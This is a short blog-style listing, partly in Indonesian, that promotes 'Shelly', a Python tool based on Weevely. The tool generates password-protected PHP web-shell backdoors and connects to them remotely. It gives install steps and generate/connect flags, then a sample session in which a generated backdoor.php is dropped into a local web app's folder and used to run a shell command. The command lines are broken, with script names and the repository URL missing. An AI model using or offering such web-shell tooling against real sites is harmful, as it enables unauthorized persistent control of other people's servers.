Shelly - Simple Backdoor Manager With Python (Based On Weevely)

Shelly adalah sebuah tool sederhana yang ditulis menggunakan Python, yang berfungsi untuk meremote sebuah website

Instalation :
$ git clone
$ cd Shelly
$ python3

Requirements :
sudo pip install -r requirements.txt

Example :

python3 -g backdoor -p tegal1337
   ______      ____
  / __/ / ___ / / __ __
 _\ \/ _ / -_/ / / // /
/___/_//_\__/_/_/\_, /
                /___/  v.1
Python shell - Tegal1337 |
Generate :
[+] ./ -g "nama_shell" -p "password"
Connect Server :
[+] ./ -u "url_shell" -p "password"

Backdoor berhasil dibuat dengan nama backdoor.php dan password tegal1337

dalpan@Tegal1337:~/Tools$ mv backdoor.php /opt/lampp/htdocs/php-futsal/
dalpan@Tegal1337:~/Tools$ python3 -u "http://localhost/php-futsal/backdoor.php" -p tegal1337
/opt/lampp/htdocs/php-futsal$ id
uid=1(daemon) gid=1(daemon) groups=1(daemon)

Contact :

Shelly - Simple Backdoor Manager With Python (Based On Weevely) Shelly - Simple Backdoor Manager With Python (Based On Weevely) Reviewed by Zion3R on 8:30 AM Rating: 5